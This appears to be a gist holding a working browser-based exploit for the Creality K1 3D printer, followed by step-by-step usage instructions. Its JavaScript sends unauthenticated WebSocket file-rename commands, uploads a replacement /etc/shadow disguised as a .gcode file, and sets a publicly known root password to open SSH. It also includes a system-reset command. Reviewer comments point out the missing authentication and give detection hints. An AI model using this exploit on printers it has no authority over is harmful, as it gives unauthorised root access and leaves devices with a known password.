Creality K1 exploit method A (thanks to https://www.youtube.com/c/SorkinDmitry)
<html> | |
<head> | |
<title>K1 exploit for K3D Chat</title> | |
<script> | |
// Replacement /etc/shadow contents, one entry per line: root gets a fixed
// "$5$" (sha256-crypt) hash and every other account is locked with "*".
// NOTE(review): the hash is public (this page's README gives the matching
// password), so a device patched with it has a root password that anyone who
// has read this gist knows — the user should change it on first login and keep
// the printer off untrusted networks.
const patchedShadowStr = [
  "root:$5$/iMbCgHty3$rM7UZICj9tmUe13BcAOUgVvpa.sSMV4k/t2Yes64ZZ9:::::::",
  "daemon:*:::::::",
  "bin:*:::::::",
  "sys:*:::::::",
  "sync:*:::::::",
  "mail:*:::::::",
  "www-data:*:::::::",
  "operator:*:::::::",
  "nobody:*:::::::",
  "dbus:*:::::::",
].map((entry) => `${entry}\n`).join("");
// Wrapped as a text/plain Blob so it can be attached to a FormData upload.
const patchedShadowBlob = new Blob([patchedShadowStr], { type: "text/plain" });
// Opens a plain (unencrypted) WebSocket to port 9999 on the host typed into
// the "ip" input and sends `payload` as soon as the connection opens.
//   payload   - string sent verbatim (the JSON command strings used below)
//   needAlert - when true, report success/failure via alert() about 100 ms
//               after sending; when false, send silently
// Returns nothing. The socket is only closed on the "Payload sent!" path, so
// with needAlert=false it is never closed explicitly.
// NOTE(review): no onerror/onclose handler is installed, so a refused or
// dropped connection produces no feedback at all; "Payload sent!" only means
// the socket was still OPEN 100 ms later, not that the printer acknowledged
// anything.
// NOTE(review): the connection carries no credential of any kind. If the
// service really accepts these commands unauthenticated (as the page's
// instructions imply), every host that can reach port 9999 can issue them —
// network isolation of the printer is the only mitigation available to an
// owner.
function sendPayload(payload,needAlert = true) {
  var ip = document.getElementsByName("ip")[0].value
  var socket = new WebSocket('ws://' + ip + ':9999')
  socket.onopen = function(e) {
    socket.send(payload);
    if (needAlert) {
      // Heuristic status check: an OPEN socket after 100 ms is treated as
      // success; there is no reply from the server to wait for.
      setTimeout(function(){
        if (socket.readyState === WebSocket.OPEN) {
          alert('Payload sent!')
          socket.close()
        } else {
          alert('Payload failed!')
        }
      }, 100)
    }
  }
}
// "Method A": replaces /etc/shadow on the printer with patchedShadowBlob in
// three timed steps driven from the browser:
//   1. WebSocket: rename /etc/shadow -> /etc/shadow.bak (keeps a backup)
//   2. 250 ms later, HTTP POST: upload the new file as new_shadow.gcode
//   3. on HTTP 200, WebSocket: rename the uploaded file onto /etc/shadow
// Takes no arguments and returns nothing; progress goes to console.log and
// the outcome to alert().
// NOTE(review): the steps are sequenced by fixed delays, not by responses.
// The backup rename is assumed complete after 250 ms, and the final alert is
// shown as soon as the last command has been handed to sendPayload, before
// that rename is confirmed. Statement order and the delays are load-bearing.
// NOTE(review): from a defender's side, the observable pattern is an upload
// named *.gcode whose body is not G-code, followed by "renameprt" requests
// whose target lies outside the gcodes directory — if the device logs these
// requests, that is what to alert on. The /etc/shadow.bak left by step 1 is
// the recovery path if the new file is wrong.
function patchShadow() {
  var ip = document.getElementsByName("ip")[0].value
  console.log('Backing up current shadow file...')
  sendPayload('{"method":"set","params":{"opGcodeFile":"renameprt:/etc/shadow:/etc/shadow.bak"}}', false)
  setTimeout(function(){
    console.log('Uploading new shadow file...')
    const fd = new FormData()
    fd.append('file', patchedShadowBlob, 'new_shadow.gcode')
    const xhr = new XMLHttpRequest();
    xhr.onload = function(e) {
      // Loose == works because status is a number; === would be the idiom.
      if (xhr.status == 200) {
        console.log('Applying new shadow file...')
        sendPayload('{"method":"set","params":{"opGcodeFile":"renameprt:/usr/data/printer_data/gcodes/new_shadow.gcode:/etc/shadow"}}', false)
        // Shown before the rename above has been acknowledged.
        alert('Payload sent! New SSH credentials should be:\nroot:creality')
      } else {
        alert('Upload failed!')
      }
    }
    // Plain HTTP, no credentials: the upload endpoint is reached with nothing
    // but the LAN address.
    xhr.open('POST', 'http://' + ip + '/upload/new_shadow.gcode', true);
    xhr.send(fd)
  }, 250)
}
/**
 * "Method B": asks the printer to move a file that was previously uploaded
 * as shadow.gcode onto /etc/shadow, then reports the outcome with an alert
 * (sendPayload's default). Takes no arguments and returns nothing.
 * The command is the same unauthenticated "renameprt" file move that Method A
 * relies on.
 */
function moveShadow() {
  const params = {
    opGcodeFile: 'renameprt:/usr/data/printer_data/gcodes/shadow.gcode:/etc/shadow',
  };
  sendPayload(JSON.stringify({ method: 'set', params }));
}
/**
 * Sends the "resetSystem": 15 command over the WebSocket and reports the
 * outcome with an alert (sendPayload's default). Takes no arguments and
 * returns nothing.
 * NOTE(review): what the value 15 selects is not documented on this page; the
 * UI only labels the button "Reset system if something went wrong".
 */
function reset() {
  const command = { method: 'set', params: { resetSystem: 15 } };
  sendPayload(JSON.stringify(command));
}
</script> | |
</head> | |
<body> | |
IP: <input type="text" name="ip"/><br> | |
Unlock SSH: <button onclick="patchShadow()">Method A</button> <button onclick="moveShadow()">Method B</button><br><br> | |
Reset system if something went wrong: <button onclick="reset()">Reset</button> | |
</body> | |
</html> |
How to apply the exploit: | |
1. open k3d_k1_exploit.html in a browser
2. enter the K1's LAN IP address
3. click "Method A" | |
4. login over ssh as root with password `creality` | |
The exploit was entirely created by Dmitry Sorkin (https://www.youtube.com/c/SorkinDmitry)
More information and a filesystem dump are available in Dmitry's Telegram channel: https://t.me/dsorkin